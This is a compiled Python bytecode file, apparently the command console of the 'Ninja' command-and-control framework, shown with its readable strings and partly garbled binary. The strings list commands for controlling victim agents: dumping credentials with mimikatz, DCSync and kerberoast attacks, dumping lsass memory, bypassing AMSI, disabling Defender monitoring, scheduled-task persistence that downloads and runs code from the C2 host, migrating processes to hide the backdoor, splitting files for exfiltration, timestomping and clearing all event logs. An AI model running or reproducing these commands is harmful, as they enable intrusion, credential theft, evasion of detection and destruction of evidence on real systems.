4iddlZddlZddlZddlZddlZddlmZddlmZddl m Z ddl m Z ddl mZddl mZddl mZdd lTdd lTdd lTdd lmZdd lmZeZd ZGd dZdS)N)Console)box)Live)Table)config) webserver)webshell)*) prettytable)callcnfdtjD}|t|kr||SdS)Nc>g|]}||S) startswith).0itexts /home/kali/Ninja/core/cmd.py z%Command_Completer..s*===Q!,,t*<*<=q===)cmdCOMMANDSlen)rstateoptionss` rCommand_Completerrs>====#,===G s7||u~trc veZdZgdZddgddgddgdd gd d gd d gddgddggZddgddgddgddgddgddgddgd d!gd"d#gd$d%gd&d'gg Zd(d)gd*d+gd,d-gd.d/gd0d1gd2d3gd4d5gd6d7gd8d9gd:d;gdd?gg Zd@dAgdBdCgdDdEgdFdGgdHdIgdJdKgdLdMgdNdOgdPdQgg ZddSZddTZ ddUZ ddVZ ddWZ ddXZ ddYZddZZdd[Zdd\Zdd]Zdd^Zdd_Zdd`ZddaZddbZddcZdddZddeZddfZddgZddhZddiZddjZddkZ ddlZ!ddmZ"ddnZ#ddoZ$ddpZ%ddqZ&ddrZ'ddsZ(ddtZ)dduZ*ddvZ+ddwZ,ddxZ-ddyZ.ddzZ/dd{Z0dd|Z1dd}Z2dd~Z3dRS)r)*exitshowresethelplistusedeletebackpayloadmodulesencode64gen_ntlmdrmDA downloadsdownloadupload set_beaconkerb dumpcreds dcsync_admins dcsync_list dcsync_all screenshotkill_all delete_all get_groups get_users bloodhounddis_amsiunamanged_powershellpersist_schtasksmigrate processlistsplitjoin webshell_moderegister_webshellgenerate_webshell time_stompclear_all_logslsass_memory_dumpr!z Help menur z Clear screenr%zBack to the mainrz%Exit the console , or kill the agent loadz load modulesr'z3list all the Available modules in Modules directoryr&z Show Payloadsr,zlist downloaded filesr"zList all agentsr#zInteract with AGENTr6zkill all agentsr$zdelete agent from the listr7zdelete all agents in the listr/z&set the beacon interval live for agentr.zupload files to the victimr-zdownload file from the victimr5z#take screenshot from victim machiner@zsplit file to small size files for data exfiltration (use join command for files in current server or use join.ps1 script to join data on windows )rAzmjoin splited file names ( include the original file name in the path and the script will know the file parts)r8z$get all the groups user is member ofr9z!get all the users member in groupr?z3list processes formatted ( Name , ID , Commandline)r0z7do kerberoast attack and dump service accounts hashesr4z)do dcsync attack and get all users hashesr2z$do dcsync attack against admin usersr1z"load mimikatz and dump credentialsr3z*do dcsync attack against custom user list r:z:run bloodhound to collect all the information about the ADr+zRun defense Analysis Moduler)z%generate ntlm hash for given passwordrGzQdump lsass memory without touching the disk then parse it and provide credentialsr(zRencode any command to base64 encoded UTF-8 command ( can be decoded in powershell)r*z>disable windows realtime monitoring - require admin privilegesunmanged_powershellz/run powershell payload through the dotnet agentr=z persistence using schedule tasksr>zmigrate to new process ( default nslookup ) to hide the backdoor , this command will only work if you enabled donut in campaign creation rBz8enter webshell mode to register and control your shells)rCzBregister webshell to be controlled : register_webshell rEzchange the ( access , modify , creation ) time of destination file as same as the source file ) . Usage time_stomp < source path > < destination path >rFz B++B/2B/ctjdkrt|dSt|dSNr )rr^rlist_webshells list_agentsrUrVs rr"zcmd.listsB  * , ,   t $ $ $ $ $ OOD ! ! ! ! !rcHttjdkrdnd}dS)Nposixclearcls)r osname)rUrV_s rr z cmd.resets# BGw..E : :rc >tjtjdztjztjdztjztjdztjztjdztjztjdztjztjdztjztjdztjztjdztjztjd ztjzg }d |_d |_|gd tj D]S}tj tj |z }|tj ttj |d ztjz|tj |dtj |dtj |ddd tj |dtj |dtj |ddztj |dztj |dg Ut|dS)NIDStatus ExternalIP InternalIPOSArch ComputerNameUsernamePIDFl) --z------ ----------rr----z ------------z--------rrrM|\r\)r PrettyTablebcolorsBOLDENDCborderalignadd_rowrrRtimeTIMEOKBLUEstrr@rP)rUrVtablerstatuss rrlzcmd.list_agentss'))M)0)F)U)0 )BW\)Q)0)= )L)NOO       1 1AY[[6;q>1F MM7>C a0@0C,D,DDw|S!!=+A.!=+A.!=+A.44S99!<!=+A.!=+A.!=+A.5 a8H8KK!=+A.0 1 1 1 1 e rctjdkrot|dkrdS|d}tjD]C}|tj|dkr%|}tj|dt_dSDdSt|dkrdS|d}tjD]P}|ttj|dkr%|}tj|dt_dSQdS)Nr rrMragent)rr]rrcr_r^rRr)rUrVidrs rr#zcmd.uses    : - -4yy1}}aB%  )!,Q///B&q)))*4F'EE 0  4yy1}}aB]  V]1-a01111B&q)))*1F'EE 2  rcFtjddt_dSrj)rr_r^rms rrBzcmd.webshell_modes!:&&&(rc &tjdkrtjdtjD]X}tj|t tjdtj|dzYdS)NrYr[r\)rr]r_rRrdrerfrgrUrVrs rr6z cmd.kill_alls    6 ) )  v & & & \ \A N1  $ $WV]GfmTUFVWXFY) rr]r^r_rcrrrPrR)rUrVrr rrs rr$z cmd.deletesT    : - -1D 1R1R  z * * *aBH%  V-a034444 HE52~~$X. F    6 ) )  v & & & t99q== - F !W  ASq)!,----. B;; e$$$ ;rctjdkrtjddStjddt_dS)Nr rYrN)rr^r_rms rr%zcmd.backsF  * , ,  z * * * * *  v & & &"$F   rcztjD]}t|dtddS)NgreenrKrN)rPAYLOADSrOrPrs rr&z cmd.payloads; , ,A MM!7M + + + + b rcttjdkrtddStd|dzd}|}tjtjttj|| dS)NrY4you can't use this command in main ! choose an agentzModules/rMr) rr]rPr`readrdrerfrgclose)rUrVfpmmodules rrHzcmd.loads    6 ) ) H I I I F:Q'--v)++,33GFM64R4RSSS rcFtjdkrtddStjtjdr=ttjd}|D]}t|dStddS)NrYrz /downloadsz%[-] downloads directory not Available)rr]rPrrpathisdir campaign_namelistdir)rUrVr,files rr,z cmd.downloadss    6 ) ) H I I I F 7==F0<<< = = ; f&:#F#F#FGGI!  d    9 : : : : :rctjdr@td}|D]!}td|zd"dStdddS)NModulesz[red]->[/red] Module %sbluerKz#[!] Modules directory not Availablered)rrrrrrOrP)rUrVr'rs rr'z cmd.modules's 7== # # Njj++G! O O 8?v NNNN O O MM?uM M M M M MrcJt|dkrd}d|dd}t|tdt|ddzdStddS)NrMrN zencoded command : zUTF-16LEutf-8z<[-] please add your command as argument : encode64 )rrArPbase64 b64encodeencodedecode)rUrVb64s rr(z cmd.encode64/s t99q==C((48$$C #JJJ '&*:*:3::j;Q;Q*R*R*Y*YZa*b*bb c c c c c P Q Q Q Q QrcDt|dkr}|d}tjd|d}t j|}td|dzdStddS)NrMmd4zutf-16lez NTLM Hash : zUTF-8z>[-] please add your password as argument : gen_ntlm ) rhashlibnewrdigestbinasciihexlifyrPr)rUrVpasswordhashs rr)z cmd.gen_ntlm:s t99q==AwH;uhooj&A&ABBIIKKD#D))D /DKK$8$88 9 9 9 9 9 R S S S S SrctjdkrtddStjdkrtddStjtjt tjdtjtjt tjddS)NrYrr+This command can only be used in agent modeload PowerView.ps1z load DA.ps1rr]rPr^rdrerfrgrms rr+zcmd.DACs    6 ) ) H I I I F  ' ) ) ? @ @ @ Fv)++,33GFMK_4`4`aaav)++,33GFM=4Y4YZZZZZrcltjdkrtddStjdkrtddStjtjt tjdtjtjt tjdtjtjt tjddS)NrYrrrzload Find-PSServiceAccounts.ps1zload Invoke-Kerberoast.ps1z load kerb.ps1rrms rr0zcmd.kerbNs    6 ) ) H I I I F  ' ) ) ? @ @ @ Fv)++,33GFMKl4m4mnnnv)++,33GFMKg4h4hiiiv)++,33GFM?4[4[\\\\\rctjdkrtddStjdkrtddStdtjtjt tjdtjtjt tjddS)NrYrrrz[grab some coffe this may take too long to finish if the domain admin users are more than 10load Invoke-Mimikatz.ps1z$users=(Get-ADGroupMember -Identity "Domain Admins").SamAccountName;For ($i=0; $i -le $users.Length; $i=$i+5) {echo $users[$i..($i+4)] | ForEach-Object { $t='"lsadump::dcsync /user:rep"';$t=$t.replace("rep",$_);Invoke-Mimikatz -Command $t}}rrms rr2zcmd.dcsync_adminsZs    6 ) ) H I I I F  ' ) ) ? @ @ @ F klllv)++,33GFMKe4f4fgggv)++,33GFM=t5u5u v v v v vrc FtjdkrtddStjdkrtddStjtjt tjdtjtjt tjddtj tjddS) NrYrrrrzGInvoke-Mimikatz -Command '"lsadump::dcsync /domain:{domain} /all /csv"'z{domain}r) rr]rPr^rdrerfrgreplacerRrms rr4zcmd.dcsync_allfs    6 ) ) H I I I F  ' ) ) ? @ @ @ Fv)++,33GFMKe4f4fgggv)++,33GFM=J=R=R@JFMZ`ZlZnZnLopqLr=t=t5u5u v v v v vrc tjdkrtddStjdkrtddSg} t |dkrtddStdt d|d dd d krFd|d dd d d d }nit|d d }| }| |dd }d|}tj tj ttjdtj tj ttjdd|dS#t$r}t|Yd}~dSd}~wwxYw)NrYrrrrz"Usage dcsunc_list zNgrab some coffe this may take too long to finish if the users are more than 10rrM,z, z ,r rNrz$users=("{users}").split(",");For ($i=0; $i -le $users.Length; $i=$i+5) {echo $users[$i..($i+4)] | ForEach-Object { $t='"lsadump::dcsync /user:rep"';$t=$t.replace("rep",$_);Invoke-Mimikatz -Command $t}}z{users})rr]rPr^rrAr@rr`rrrdrerfrg Exception)rUrVuserusersr"es rr3zcmd.dcsync_listrs!    6 ) ) H I I I F  ' ) ) ? @ @ @ F 4yy1}}:;;; b c c c388DH%%++C0011A55abb**224==EEdCPPDGS))   dC00 N6-// 0 7 7 Oi8j8j k k k N6-// 0 7 7 ARAZAZDMuAVAV9W9W X X X X X    !HHHHHHHHH s "H"1F/H"" I,IIctjdkrtddStjdkrtddS t |dkrtddSd|dd}tjtjttj d d d |}tjtjttj |dS#t$r}t|Yd}~dSd}~wwxYw) NrYrrrrzUsage get_groups rrMrz(New-Object System.DirectoryServices.DirectorySearcher("(&(objectCategory=User)(samAccountName=$("{user}")))")).FindOne().GetDirectoryEntry().memberOfz{user} rr]rPr^rrArdrerfrgrr)rUrVrrs rr8zcmd.get_groupssM    6 ) ) H I I I F  ' ) ) ? @ @ @ F 4yy1}}455588DH%%D N6-// 0 7 7 Oc8d8d e e epxx$  D N6-// 0 7 7 t8T8T U U U U U    !HHHHHHHHH  "E/CE E$ EE$ctjdkrtddStjdkrtddS t |dkrtddSd|dd}tjtjttj d d d |}tjtjttj |dS#t$r}t|Yd}~dSd}~wwxYw) NrYrrrrzUsage get_users rrMrz2Get-DomainGroupMember -Identity "{group}" -Recursez{group}r)rUrVgrouprs rr9z cmd.get_userssA    6 ) ) H I I I F  ' ) ) ? @ @ @ F 4yy1}}4555HHT!""X&&E N6-// 0 7 7 Oc8d8d e e eLTTU^`effE N6-// 0 7 7 u8U8U V V V V V    !HHHHHHHHH rc *tjdkrtddStjdkrtddStjtjt tjdtjtjt tjdddtd DzdS) NrYrrrzload SharpHound.ps1z?Invoke-BloodHound -CollectionMethod All -MemCache -ZipFileName rNcVg|]&}ttj'Srrandomchoicestringascii_uppercaserrs rrz"cmd.bloodhound..s@AKAKAKklvOeAfAfAKAKAKrr) rr]rPr^rdrerfrgrArangerms rr:zcmd.bloodhounds    6 ) ) H I I I F  ' ) ) ? @ @ @ Fv)++,33GFMK`4a4abbbv)++,33GFM<}ACAHAHAKAKAFqAKAKAKALAL=L5M5M N N N N Nrc4tjdkrtddStjdkrtddStjtjt tjddS)NrYrrrz-Set-MpPreference -DisableRealtimeMonitoring 1rrms rr*zcmd.drms    6 ) ) H I I I F  ' ) ) ? @ @ @ Fv)++,33 FM#R S S U U U U Urc4tjdkrtddStjdkrtddStjtjt tjddS)NrYrrrzload AMSI_Bypass.ps1rrms rr;z cmd.dis_amsis    6 ) ) H I I I F  ' ) ) ? @ @ @ Fv)++,33GFMKa4b4bcccccrctjdkrtddStjdkrtddStjtjt tjdtjtjt tjddS)NrYrrrrzHInvoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonpasswords"'rrms rr1z cmd.dumpcredss    6 ) ) H I I I F  ' ) ) ? @ @ @ Fv)++,33GFMKe4f4fgggv)++,33 FM#q r r t t t t trc XtjdkrtddStjdkrtddSd}t |dkr~t d}t |dkrF |d krd }nR|d krd }nI|d krd }n@|dkrd}n7|dkrdSn#tdd}YxxYwd}~t |dk~t rd}nd}tjtjttj d dt dt dt d| d|dS)NrYrrrrNrzkplease enter schedule type ( hourly , daily , weekly , onstart) or type exit to exit the persistence modulerMhourlyHourlydailyDailyonstartweeklyrzyou entered wrong schedule typehttpshttpzschtasks /F /create /SC {freq} /RU "NT Authority\SYSTEM" /TN "\Microsoft\Windows\UpdateOrchestrators\AC Power install" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''{HTTP}://{ip}:{port}{payload}''')'"{ip}{port}z {payload}{HTTP}z{freq})rr]rPr^rinputSSLrdrerfrgrHOSTPORT raw_payload)rUrVCCfreqrs rr=zcmd.persist_schtaskss    6 ) ) H I I I F  ' ) ) ? @ @ @ F "ggll}B2ww{{X~~'W}}&Y(X~~'V||$;<<<BH3"ggll4  DDDv)++,33GFM=j=r=r@F=N=NNUgV^`dNeNefmfm@K[gZgZZaZabjbf[h[hhoho@H$iPiP 5Q5Q R R R R Rs$B/ B/B/B/&B//CctjdkrtddStjdkrtddSt dd}|}|tr{|dtdtd td td d }nz|dtdtd td td d }t dd}| ||tjtjt!tjdtjtjt!tjddS)NrYrrrzcore/agents/screenshot.ninjarrrz{image}z{cmd}rrrzModules/screenshot.ps1wzload screenshot.ps1z scr -test 0 )rr]rPr^r`rrrrrr image_url command_urlwriterdrerfrgrUrVrhr&s rr5zcmd.screenshot s    6 ) ) H I I I F  ' ) ) ? @ @ @ F / 5 5&&((   @oofd33;;HdKKSST]_hiiqq&&&-gh&@&@ Goofd33;;HdKKSST]_hiiqq&&&-gh&?&?  )3 / /   v)++,33GFMK`4a4abbbv)++,33GFM?4[4[\\\\\rctjdkrtddStjdkr=t jt jtjtj |fdStdd}| }| tdkrb|dtdt d t"d d }na|dtdt d t"d d }td d}||| tjtjt+tjdtjtjt+tjd|dzdzdS)NrYrr zcore/agents/upload.ninjarTrrz{upload}rrrzModules/upload.ps1rzload upload.ps1zup -filename "rM")rr]rPr^_threadstart_new_threadr upload_filercPOINTERr`rrrrrr upload_urlrrdrerfrgrs rr.z cmd.upload!s    6 ) ) H I I I F  * , ,  $X%9FNv~>^`d=f g g g g g1377AffhhG GGIII v!//&$77??$OOWWXdXdfffmfmnvnugwgw"//&$77??$OOWWXdXdfffmfmnvntgvgv+S11A GGG    GGIII N6-// 0 7 7 Ob8c8c d d d N6-// 0 7 7 O`cghicjOjmqOq8r8r s s s s srcFtjdkrtddStjdkrtddStjtjt tjd|dzdS)NrYrrrz $exchange=rMrrms rr/zcmd.set_beaconQs    6 ) ) H I I I F  ' ) ) ? @ @ @ Fv)++,33GFM.ts' E E EqV]]61 2 2 E E ErrzModules/Migrator.ps1rzload Migrator.ps1)rr]rPr^Donutdonutcreater`rrrrrrArrrrdrerfrg)rUrV shellcodefptempoutputs rr>z cmd.migrateess    6 ) ) H I I I F  ' ) ) ? @ @ @ F|  U V V V FLL&QLRR . 4 4wwyy||M6+;+;I+F+F+M+Mg+V+VWW__`ikmkrkr E EE!HH E E ElGlGHH,c22 T v)++,33GFMK^4_4_`````rc4tjdkrtddStjdkrtddStjtjt tjddS)NrYrrrz_Get-WmiObject Win32_Process | select Name,ProcessId,CommandLine | Format-Table -Wrap -AutoSizerrms rr?zcmd.processlistzs    6 ) ) H I I I F  ' ) ) ? @ @ @ Fv)++,33GFM=^5_5_ ` ` ` ` `rc ptjdkrtddStjdkrtddSd}t |dkrtddSd|d d}t |d krdt d }t |d kr, t|d z}n#td d}Y^xYwd}dt |d kdtjtj ttj dtjtj ttj d|zdzt|zdS)NrYrrrrNrzUsage split rrMrz"please enter the split size in MB izError reading the size providedzload split.ps1z split -path z -chunksize ) rr]rPr^rrArintrdrerfrgr)rUrVMBrBytess rr@z cmd.splits    6 ) ) H I I I F  ' ) ) ? @ @ @ F  t99q== 0 1 1 1 FxxQRR!!"ggll;<D#8>#ICPUJJ#V W W Y Y Y Y Ys CC+ctjdkrtddSt|dkrtddSd|dd}t |dz}t |t|dkrtd dSt|d 5}|D]Q}t|d 5}| | dddn #1swxYwYR dddn #1swxYwY| dS) NrrrzEUsage join rrMz.*.partrz=No files found check the path provided and original file namerZrb) rr^rPrrAglobr"sortr`rrr)rUrVr filenamesoutfilenamesinfiles rrAzcmd.joins  ' ) ) ? @ @ @ F t99q== Y Z Z Z FxxQRR!!IIdY.//  ) y>>Q   Q R R R F $   1" 1 1%&&1&MM&++--000111111111111111 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1  s6D0#(D D0D D0D D00D47D4ctjdkrtddSt|dkrtddS|d}|d}dt_tjD]}tjdzt_tjtjttjdz||gitjdzt_dS)Nr z0you can only use this command in webshell mode !rz#Usage register_webshell rMrr)rr]rPrWEBSHELL_COUNTrcupdater)rUrVURLKEYrs rrCzcmd.register_webshells    : - - D E E E F t99q== 7 8 8 8 F1g1g !! > >A$*$9A$=F ! !!6V=RUV=V9W9WY\^a8b cddd & 5 9rctjgd}tjD])}tj|}||*t |dS)N)rr&r')r rrrcrrP)rUrVtrrs rrkzcmd.list_webshellss\  #$8$8$8 9 9!  A$Q'E IIe     arc,tjdSN)r rDrms rrDzcmd.generate_webshells"$$$$$rctjdkritjdkrRtjdkr;tjt jtjtj|ftjdkrtjdkrtjdkrt|dkrtddSd}| d|d d |d }tj tj ttj|dSdSdSdS) Nr rYrrzUsage : time_stomp < destination file to edit its date >z$(Get-item {Dest_Path}).creationtime=$(Get-item {Src_Path} ).creationtime;$(Get-item {Dest_Path}).lastaccesstime=$(Get-item {Src_Path} ).lastaccesstime;$(Get-item {Dest_Path}).lastwritetime=$(Get-item {Src_Path} ).lastwritetimez {Src_Path}rMz {Dest_Path}r)rr^r]rrr rErcrrrPrrdrerfrg)rUrVCommandss rrEzcmd.time_stompsF  * , ,1C1E1E1S1SX^XjXlXlpvXvXv  $X%86;KFN;[]a:c d d d  ' ) )f.@.B.Bj.P.PU[UgUiUimsUsUs4yy1}}]^^^A#++L$q'BBJJ=Z^_`Zabbv1334;;GFMS[<\<\]]]]] * ).P.PUsUsrctjdkrtjdkrtjdkrxtjt jtjtjdgftjt jtjtjdgftjdkr~tjdkritjdkrTtj tj ttj ddSdSdSdS)Nr rYz!wevtutil cl "Windows PowerShell" z2for /f %x in ('wevtutil el') do (wevtutil cl "%x")rzIwevtutil el | Foreach-Object {Write-Host "Clearing $_"; wevtutil cl "$_"}) rr^r]rrr webshell_executercrrdrerfrgrms rrFzcmd.clear_all_logss7  * , ,1C1E1E1S1SX^XjXlXlpvXvXv  $X%>&,&6v~&FIpHq%s u u u  $X%> 03k2lAo p p p  ' ) )f.@.B.Bj.P.PU[UgUiUimsUsUs N6-// 0 7 7 'vww y y y y y * ).P.PUsUsrc tjdkrtddStjdkrtddS t dd}|}|ddd td D}t d d }| || tj tj ttjd dS#tdYdSxYw)NrYrrrzModules/safetydump.ninjarz{CLASS}rNcVg|]&}ttj'Srrrs rrz)cmd.lsass_memory_dump..s(3l3l3l^_FMM&BX4Y4Y3l3l3lrrzModules/SafetyDump.ps1rzload SafetyDump.ps1zError in lsass_memory_dump)rr]rPr^r`rrrArrrrdrerfrg)rUrVrrrs rrGzcmd.lsass_memory_dumps-    6 ) ) H I I I F  ' ) ) ? @ @ @ F 00#66B7799D<< 2773l3lchijckck3l3l3l+m+mnnD2C88F LL    LLNNN N6-// 0 7 7 Od8e8e f f f f f 0 . / / / / / /s C+D88E r+)4__name__ __module__ __qualname__rrQrRrSrTr!rr"r rlr#rBr6r7r$r%r&rHr,r'r(r)r+r0r2r4r3r8r9r:r*r;r1r=r5r.r-r/r<r>r?r@rArCrkrDrErFrGrrrrr"s)%)%)%HV[ ! n % ' ( < = ^ $ M N  ( 1 2 4D()+,,-56<=EF56:;BCnoGH IF FGBC!VWST KL!#IJCD!MN \]56EF%'z{ }Im n T U "$U V !C D d e X Y "f g u v ] ^ `D& Z Z Z Z"""" ;;;;!!!!F,))))\\\\  %%%%4%%%%  ; ; ; ;NNNN R R R RTTTT [ [ [ [ ] ] ] ] v v v v v v v v8&$ N N N NUUUUdddd t t t t+R+R+R+RZ]]]],tttt,tttt4ddddggggaaaa* ` ` ` `YYYY8*:::: %%%% ^ ^ ^ ^ y y y y000000rr)rrrrar rich.consolerrichr rich.liver rich.tablercorerrr core.Encryption core.color core.configcore.libr subprocessr rOrrrrrr?sP !   '))\ 0\ 0\ 0\ 0\ 0\ 0\ 0\ 0\ 0\ 0r